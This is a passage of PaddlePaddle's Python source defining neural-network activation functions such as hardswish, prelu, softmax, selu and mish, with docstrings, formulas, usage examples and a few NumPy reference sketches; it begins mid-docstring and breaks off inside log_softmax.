offset (float, optional): The offset of hardsigmoid function. Default is 0.5.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-4., 5., 1.])
out = F.hardsigmoid(x) # [0., 1., 0.666667]
"""
if in_dynamic_mode():
return _C_ops.hard_sigmoid(x, 'slope', slope, 'offset', offset)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardsigmoid')
helper = LayerHelper('hardsigmoid', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='hard_sigmoid',
inputs={'X': x},
outputs={'Out': out},
attrs={'slope': slope,
'offset': offset})
return out
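# A minimal NumPy sketch of hardsigmoid for the default slope/offset documented above; with
# slope = 1/6 and offset = 0.5 the clip form below matches the +/-3 cutoffs exactly.
# Illustrative only, not part of the Paddle API.
def _hardsigmoid_numpy_reference(x, slope=0.1666667, offset=0.5):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    return np.clip(slope * x + offset, 0.0, 1.0)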
def hardswish(x, name=None):
r"""
hardswish activation
    hardswish was proposed in MobileNetV3, and offers better numerical stability and
    efficiency than the swish function. For more details, please refer
to: https://arxiv.org/pdf/1905.02244.pdf
.. math::
hardswish(x)=
\left\{
\begin{array}{cll}
0 &, & \text{if } x \leq -3 \\
x &, & \text{if } x \geq 3 \\
\frac{x(x+3)}{6} &, & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-4., 5., 1.])
out = F.hardswish(x) # [0., 5., 0.666667]
"""
if in_dynamic_mode():
return _C_ops.hard_swish(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardswish')
helper = LayerHelper('hardswish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='hard_swish', inputs={'X': x}, outputs={'Out': out})
return out
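# A minimal NumPy sketch of the hardswish piecewise definition above; illustrative only,
# not part of the Paddle API.
def _hardswish_numpy_reference(x):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    # 0 for x <= -3, x for x >= 3, and x * (x + 3) / 6 in between
    return x * np.clip(x + 3.0, 0.0, 6.0) / 6.0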
def leaky_relu(x, negative_slope=0.01, name=None):
r"""
leaky_relu activation
.. math::
leaky\_relu(x)=
\left\{
\begin{array}{rcl}
x, & & if \ x >= 0 \\
negative\_slope * x, & & otherwise \\
\end{array}
\right.
Args:
x (Tensor): The input Tensor with data type float32, float64.
negative_slope (float, optional): Slope of the activation function at
:math:`x < 0` . Default is 0.01.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-2., 0., 1.])
out = F.leaky_relu(x) # [-0.02, 0., 1.]
"""
if in_dynamic_mode():
return _C_ops.leaky_relu(x, 'alpha', negative_slope)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'leaky_relu')
helper = LayerHelper('leaky_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='leaky_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': negative_slope})
return out
def prelu(x, weight, data_format="NCHW", name=None):
"""
prelu activation.
.. math::
prelu(x) = max(0, x) + weight * min(0, x)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
weight (Tensor): The learnable parameter with data type same as ``x``.
The weight shape is [1] or [in], where `in` is the input channel of ``x``.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
data_format(str, optional): Data format that specifies the layout of input.
It may be "NC", "NCL", "NCHW", "NCDHW", "NLC", "NHWC" or "NDHWC". Default: "NCHW".
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
data = np.array([[[[-2.0, 3.0, -4.0, 5.0],
[ 3.0, -4.0, 5.0, -6.0],
[-7.0, -8.0, 8.0, 9.0]],
[[ 1.0, -2.0, -3.0, 4.0],
[-5.0, 6.0, 7.0, -8.0],
[ 6.0, 7.0, 8.0, 9.0]]]], 'float32')
x = paddle.to_tensor(data)
w = paddle.to_tensor(np.array([0.25]).astype('float32'))
out = F.prelu(x, w)
# [[[[-0.5 , 3. , -1. , 5. ],
# [ 3. , -1. , 5. , -1.5 ],
# [-1.75, -2. , 8. , 9. ]],
# [[ 1. , -0.5 , -0.75, 4. ],
# [-1.25, 6. , 7. , -2. ],
# [ 6. , 7. , 8. , 9. ]]]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'prelu')
check_variable_and_dtype(weight, 'weight',
['float16', 'float32', 'float64'], 'prelu')
assert len(weight.shape
) == 1, "The dim count of weight shape should be 1 in prelu()."
mode = 'all'
if weight.shape[0] > 1:
true_data_format = [
'NC', 'NCL', 'NCHW', 'NCDHW', 'NLC', 'NHWC', 'NDHWC'
]
if data_format not in true_data_format:
raise ValueError(
"data_format must be one of 'NC', 'NCL', 'NCHW', 'NCDHW', "
"'NLC', 'NHWC', 'NDHWC' but receive {}".format(data_format))
data_format = 'NCHW' if data_format[1] == 'C' else 'NHWC'
assert len(
x.shape
) > 1, "The dim count of x should be equal or larger than 2 in prelu() when weight shape is not [1]."
#NOTE(GuoxiaWang): support NHWC data format
if data_format == 'NHWC':
assert weight.shape[0] == x.shape[
-1], "The weight size should be equal to x input channel in prelu() when weight shape is not [1]."
else:
assert weight.shape[0] == x.shape[
1], "The weight size should be equal to x input channel in prelu() when weight shape is not [1]."
mode = 'channel'
if in_dynamic_mode():
return _C_ops.prelu(x, weight, 'mode', mode, 'data_format', data_format)
helper = LayerHelper('prelu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type="prelu",
inputs={"X": x,
"Alpha": weight},
outputs={"Out": out},
attrs={"mode": mode,
"data_format": data_format})
return out
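# A minimal NumPy sketch of prelu for a channels-first (NCHW-like) layout, broadcasting a
# shared or per-channel weight; illustrative only, not the Paddle implementation.
def _prelu_numpy_reference(x, weight):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    w = np.asarray(weight, dtype=np.float64)
    if w.size > 1:
        # channel-wise weight: reshape to (1, C, 1, ..., 1) so it broadcasts over N and spatial dims
        w = w.reshape((1, -1) + (1,) * (x.ndim - 2))
    return np.maximum(0.0, x) + w * np.minimum(0.0, x)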
def relu(x, name=None):
"""
relu activation.
.. math::
out = max(x, 0)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-2, 0, 1]).astype('float32'))
out = F.relu(x) # [0., 0., 1.]
"""
if in_dynamic_mode():
return _C_ops.relu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu')
helper = LayerHelper('relu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='relu', inputs={'X': x}, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def relu_(x, name=None):
"""
Inplace version of ``relu`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_relu`.
"""
if paddle.fluid.framework._in_eager_mode_:
return _C_ops.final_state_relu_(x)
return _C_ops.relu_(x)
def log_sigmoid(x, name=None):
r"""
log_sigmoid activation.
.. math::
log\_sigmoid(x) = log \frac{1}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([1.0, 2.0, 3.0, 4.0])
out = F.log_sigmoid(x) # [-0.313262 -0.126928 -0.0485874 -0.0181499]
"""
if in_dynamic_mode():
return _C_ops.logsigmoid(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'log_sigmoid')
helper = LayerHelper("log_sigmoid", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='logsigmoid', inputs={'X': x}, outputs={'Out': out})
return out
def maxout(x, groups, axis=1, name=None):
r"""
maxout activation.
Assumed the input shape is (N, Ci, H, W).
The output shape is (N, Co, H, W).
Then Co = Ci/groups and the operator formula is as follows:
.. math::
\begin{array}{l}
&out_{si+j} = \max_{k} x_{gsi + sk + j} \\
&g = groups \\
&s = \frac{input.size}{num\_channels} \\
&0 \le i < \frac{num\_channels}{groups} \\
&0 \le j < s \\
&0 \le k < groups
\end{array}
Parameters:
x (Tensor): The input is 4-D Tensor with shape [N, C, H, W] or [N, H, W, C], the data type
of input is float32 or float64.
        groups (int): The group number of maxout. The number of channels along the
            maxout axis must be divisible by ``groups``; each output channel is the
            maximum over one group of input channels.
axis (int, optional): The axis along which to perform maxout calculations.
It should be 1 when data format is NCHW, be -1 or 3 when data format
is NHWC. If ``axis`` < 0, it works the same way as :math:`axis + D` ,
where D is the dimensions of ``x`` . ``axis`` only supports 1, 3 or -1.
Default is 1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.rand([1, 2, 3, 4])
# [[[[0.5002636 0.22272532 0.17402348 0.2874594 ]
# [0.95313174 0.6228939 0.7129065 0.7087491 ]
# [0.02879342 0.88725346 0.61093384 0.38833922]]
# [[0.5231306 0.03807496 0.91661984 0.15602879]
# [0.666127 0.616567 0.30741522 0.24044901]
# [0.7142536 0.7351477 0.31588817 0.23782359]]]]
out = F.maxout(x, groups=2)
# [[[[0.5231306 0.22272532 0.91661984 0.2874594 ]
# [0.95313174 0.6228939 0.7129065 0.7087491 ]
# [0.7142536 0.88725346 0.61093384 0.38833922]]]]
"""
if in_dynamic_mode():
return _C_ops.maxout(x, 'groups', groups, 'axis', axis)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'maxout')
if axis not in [1, -1, 3]:
raise ValueError(
"Attr(axis) should be 1 when data format is NCHW, -1 or 3 when data format is NHWC. Received "
"Attr(axis): %s." % str(axis))
if axis == -1:
axis = 3
helper = LayerHelper('maxout', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='maxout',
inputs={'X': x},
outputs={'Out': out},
attrs={'groups': groups,
'axis': axis})
return out
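# A minimal NumPy sketch of maxout for an NCHW input: channels are split into `groups`
# consecutive groups and the maximum is taken inside each group, so Co = Ci / groups.
# Illustrative only, not the Paddle kernel.
def _maxout_numpy_reference(x, groups):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)          # expected shape (N, C, H, W)
    n, c, h, w = x.shape
    assert c % groups == 0, "the channel count must be divisible by groups"
    return x.reshape(n, c // groups, groups, h, w).max(axis=2)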
def relu6(x, name=None):
"""
relu6 activation
.. math::
relu6(x) = min(max(0,x), 6)
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-1, 0.3, 6.5]))
out = F.relu6(x) # [0, 0.3, 6]
"""
threshold = 6.0
if in_dynamic_mode():
return _C_ops.relu6(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu6')
helper = LayerHelper('relu6', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='relu6',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def selu(x,
scale=1.0507009873554804934193349852946,
alpha=1.6732632423543772848170429916717,
name=None):
r"""
selu activation
.. math::
selu(x)= scale *
\left\{
\begin{array}{lcl}
x,& &\text{if } \ x > 0 \\
alpha * e^{x} - alpha,& &\text{if } \ x <= 0
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
scale (float, optional): The value of scale(must be greater than 1.0) for selu. Default is 1.0507009873554804934193349852946
alpha (float, optional): The value of alpha(must be no less than zero) for selu. Default is 1.6732632423543772848170429916717
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([[0.0, 1.0],[2.0, 3.0]]))
out = F.selu(x) # [[0, 1.050701],[2.101402, 3.152103]]
"""
if scale <= 1.0:
raise ValueError(
"The scale must be greater than 1.0. Received: {}.".format(scale))
if alpha < 0:
raise ValueError(
"The alpha must be no less than zero. Received: {}.".format(alpha))
if in_dynamic_mode():
return _C_ops.selu(x, 'scale', scale, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'selu')
helper = LayerHelper('selu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='selu',
inputs={'X': x},
outputs={'Out': out},
attrs={'scale': scale,
'alpha': alpha})
return out
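# A minimal NumPy sketch of the selu formula above with the documented default scale and
# alpha constants; illustrative only, not part of the Paddle API.
def _selu_numpy_reference(x,
                          scale=1.0507009873554804934193349852946,
                          alpha=1.6732632423543772848170429916717):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    return scale * np.where(x > 0.0, x, alpha * (np.exp(x) - 1.0))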
def silu(x, name=None):
r"""
silu activation
.. math::
silu(x) = \frac{x}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([1.0, 2.0, 3.0, 4.0])
out = F.silu(x) # [ 0.731059, 1.761594, 2.857722, 3.928055 ]
"""
if in_dynamic_mode():
return _C_ops.silu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'silu')
helper = LayerHelper("silu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='silu', inputs={'X': x}, outputs={'Out': out})
return out
def softmax(x, axis=-1, dtype=None, name=None):
r"""
This operator implements the softmax layer. The calculation process is as follows:
1. The dimension :attr:`axis` of ``x`` will be permuted to the last.
2. Then ``x`` will be logically flattened to a 2-D matrix. The matrix's second
    dimension (row length) is the same as the dimension :attr:`axis` of ``x``,
    and the first dimension (column length) is the product of all other dimensions
of ``x``. For each row of the matrix, the softmax operator squashes the
K-dimensional(K is the width of the matrix, which is also the size of ``x``'s
dimension :attr:`axis`) vector of arbitrary real values to a K-dimensional
vector of real values in the range [0, 1] that add up to 1.
3. After the softmax operation is completed, the inverse operations of steps 1 and 2
are performed to restore the two-dimensional matrix to the same dimension as the ``x`` .
It computes the exponential of the given dimension and the sum of exponential
values of all the other dimensions in the K-dimensional vector input.
Then the ratio of the exponential of the given dimension and the sum of
exponential values of all the other dimensions is the output of the softmax
operator.
For each row :math:`i` and each column :math:`j` in the matrix, we have:
.. math::
softmax[i, j] = \frac{\exp(x[i, j])}{\sum_j(exp(x[i, j])}
Example:
.. code-block:: text
Case 1:
Input:
x.shape = [2, 3, 4]
x.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = -1
Output:
out.shape = [2, 3, 4]
out.data = [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.07232949, 0.19661193, 0.19661193, 0.53444665]],
[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
Case 2:
Input:
x.shape = [2, 3, 4]
x.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = 1
Output:
out.shape = [2, 3, 4]
out.data = [[[0.00657326, 0.00657326, 0.01714783, 0.01714783],
[0.01786798, 0.01786798, 0.04661262, 0.04661262],
[0.97555875, 0.97555875, 0.93623955, 0.93623955]],
[[0.00490169, 0.00490169, 0.00490169, 0.00490169],
[0.26762315, 0.26762315, 0.26762315, 0.26762315],
[0.72747516, 0.72747516, 0.72747516, 0.72747516]]]
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
        axis (int, optional): The axis along which to perform softmax
calculations. It should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` < 0, it works the same way as
:math:`axis + D` . Default is -1.
dtype (str, optional): The data type of the output tensor, can be float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same shape and data type (use ``dtype`` if it is
specified) as x.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = np.array([[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]], 'float32')
x = paddle.to_tensor(x)
out1 = F.softmax(x)
out2 = F.softmax(x, dtype='float64')
# out1's data type is float32; out2's data type is float64
# out1 and out2's value is as follows:
# [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.07232949, 0.19661193, 0.19661193, 0.53444665]],
# [[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426],
# [0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
use_cudnn = True
if in_dynamic_mode():
outs_cast = x if dtype is None \
else _C_ops.cast(x, 'in_dtype', x.dtype, 'out_dtype', dtype)
return _C_ops.softmax(outs_cast, 'axis', axis, 'use_cudnn', use_cudnn)
if dtype is None:
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softmax')
else:
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'softmax',
'If dtype is not None, it only support float32 or float64.')
helper = LayerHelper("softmax", **locals())
outs_cast = x
if dtype is not None:
outs_cast = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='cast',
inputs={'X': x},
outputs={'Out': outs_cast},
attrs={'in_dtype': x.dtype,
'out_dtype': dtype})
outs_softmax = helper.create_variable_for_type_inference(outs_cast.dtype)
helper.append_op(
type='softmax',
inputs={'X': outs_cast},
outputs={'Out': outs_softmax},
attrs={'axis': axis,
'use_cudnn': use_cudnn})
return outs_softmax
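# A minimal NumPy sketch of an axis-wise softmax matching the description above, with the
# usual max-subtraction trick for numerical stability; illustrative only, not the Paddle kernel.
def _softmax_numpy_reference(x, axis=-1):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    shifted = x - x.max(axis=axis, keepdims=True)
    e = np.exp(shifted)
    return e / e.sum(axis=axis, keepdims=True)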
@inplace_apis_in_dygraph_only
def softmax_(x, axis=-1, dtype=None, name=None):
r"""
Inplace version of ``softmax`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_softmax`.
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
use_cudnn = True
return _C_ops.softmax_(x, 'axis', axis, 'use_cudnn', use_cudnn)
def softplus(x, beta=1, threshold=20, name=None):
r"""
softplus activation
.. math::
softplus(x) = \frac{1}{beta} * \log(1 + e^{beta * x}) \\
\text{For numerical stability, the implementation reverts to the linear function when: beta * x > threshold.}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
beta (float, optional): The value of beta for softplus. Default is 1
threshold (float, optional): The value of threshold for softplus. Default is 20
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.softplus(x) # [0.513015, 0.598139, 0.744397, 0.854355]
"""
if in_dynamic_mode():
return _C_ops.softplus(x, 'beta', beta, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softplus')
helper = LayerHelper('softplus', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='softplus',
inputs={'X': x},
outputs={'Out': out},
attrs={'beta': beta,
'threshold': threshold})
return out
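# A minimal NumPy sketch of the softplus formula above, including the documented linear
# fallback when beta * x > threshold; illustrative only, not part of the Paddle API.
def _softplus_numpy_reference(x, beta=1.0, threshold=20.0):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    bx = beta * x
    soft = np.log1p(np.exp(np.minimum(bx, threshold))) / beta  # clamp exp() to avoid overflow
    return np.where(bx > threshold, x, soft)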
def softshrink(x, threshold=0.5, name=None):
r"""
softshrink activation
.. math::
softshrink(x)=
\left\{
\begin{array}{rcl}
x - threshold,& & \text{if } x > threshold \\
x + threshold,& & \text{if } x < -threshold \\
0,& & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
        threshold (float, optional): The value of threshold (must be no less than zero) for softshrink. Default is 0.5
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.9, -0.2, 0.1, 0.8]))
out = F.softshrink(x) # [-0.4, 0, 0, 0.3]
"""
if threshold < 0:
raise ValueError(
"The threshold must be no less than zero. Received: {}.".format(
threshold))
if in_dynamic_mode():
return _C_ops.softshrink(x, 'lambda', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softshrink')
helper = LayerHelper('softshrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='softshrink',
inputs={'X': x},
outputs={'Out': out},
attrs={'lambda': threshold})
return out
def softsign(x, name=None):
r"""
softsign activation
.. math::
softsign(x) = \frac{x}{1 + |x|}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.softsign(x) # [-0.285714, -0.166667, 0.0909091, 0.230769]
"""
if in_dynamic_mode():
return _C_ops.softsign(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'softsign')
helper = LayerHelper('softsign', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='softsign', inputs={'X': x}, outputs={'Out': out})
return out
def swish(x, name=None):
r"""
swish activation.
.. math::
swish(x) = \frac{x}{1 + e^{-x}}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-2., 0., 1.]))
out = F.swish(x) # [-0.238406, 0., 0.731059]
"""
if in_dynamic_mode():
return _C_ops.swish(x, 'beta', 1.0)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'swish')
helper = LayerHelper('swish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'beta': 1.0})
return out
def mish(x, name=None):
r"""
mish activation.
.. math::
softplus(x) = \begin{cases}
x, \text{if } x > \text{threshold} \\
\ln(1 + e^{x}), \text{otherwise}
\end{cases}
mish(x) = x * \tanh(softplus(x))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-5., 0., 5.])
out = F.mish(x) # [-0.03357624, 0., 4.99955208]
"""
if in_dynamic_mode():
return _C_ops.mish(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mish')
helper = LayerHelper('mish', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='mish', inputs={'X': x}, outputs={'Out': out})
return out
def tanhshrink(x, name=None):
"""
tanhshrink activation
.. math::
tanhshrink(x) = x - tanh(x)
Args:
x (Tensor): The input Tensor with data type float32, float64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-0.4, -0.2, 0.1, 0.3]))
out = F.tanhshrink(x) # [-0.020051, -0.00262468, 0.000332005, 0.00868739]
"""
if in_dynamic_mode():
return _C_ops.tanh_shrink(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'tanhshrink')
helper = LayerHelper('tanh_shrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='tanh_shrink', inputs={'X': x}, outputs={'Out': out})
return out
def thresholded_relu(x, threshold=1.0, name=None):
r"""
thresholded relu activation.
.. math::
thresholded\_relu(x) =
\left\{
\begin{array}{rl}
x,& \text{if } \ x > threshold \\
0,& \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
threshold (float, optional): The value of threshold for thresholded_relu. Default is 1.0
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([2., 0., 1.]))
out = F.thresholded_relu(x) # [2., 0., 0.]
"""
if in_dynamic_mode():
return _C_ops.thresholded_relu(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'thresholded_relu')
helper = LayerHelper('thresholded_relu', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='thresholded_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def log_softmax(x, axis=-1, dtype=None, name=None):
r"""
This operator implements the log_softmax layer. The calculation process is
as follows:
.. math::
\begin{aligned}
log\_softmax[i, j] &= log(softmax(x)) \\
&= log(\frac{\exp(X[i, j])}{\sum_j(\exp(X[i, j])})
\end{aligned}
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
axis (int, optional): The axis along which to perform log_softmax
calculations. It should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` < 0, it works the same way as
:math:`axis + D` . Default is -1.
dtype (str|np.dtype|core.VarDesc.VarType, optional): The desired data
type of the output tensor. If dtype is specified, ``x`` is casted
to ``dtype`` before the operation is performed. This is useful for
preventing data type overflows. Supported dtype: float32, float64.
If ``dtype`` is None, the output Tensor has the same dtype as x.
Default is None.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same shape and data type (use ``dtype`` if it is
specified) as x.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = [[[-2.0, 3.0, -4.0, 5.0],
[3.0, -4.0, 5.0, -6.0],
[-7.0, -8.0, 8.0, 9.0]],
[[1.0, -2.0, -3.0, 4.0],
[-5.0, 6.0, 7.0, -8.0],
[6.0, 7.0, 8.0, 9.0]]]
x = paddle.to_tensor(x)
out1 = F.log_softmax(x)
out2 = F.log_softmax(x, dtype='float64')
# out1's data type is float32; out2's data type is float64
# out1 and out2's value is as follows:
# [[[ -7.1278396 -2.1278396 -9.127839 -0.12783948]
# [ -2.1270514 -9.127051 -0.12705144 -11.127051 ]
# [-16.313261 -17.313261 -1.3132617 -0.31326184]]
# [[ -3.0518122 -6.051812 -7.051812 -0.051812 ]
# [-12.313267 -1.3132664 -0.3132665 -15.313267 ]
# [ -3.4401896 -2.4401896 -1.4401896 -0.44018966]]]
"""
if (dtype is not None) and (not isinstance(dtype, core.VarDesc.VarType)):
dtype = convert_np_dtype_to_dtype_(dtype)
if in_dynamic_mode():
if dtype is not None:
x = _C_ops.cast(x, 'in_dtype', x.dtype, 'out_dtype', dtype)
return _C_ops.log_softmax(x, 'axis', axis)
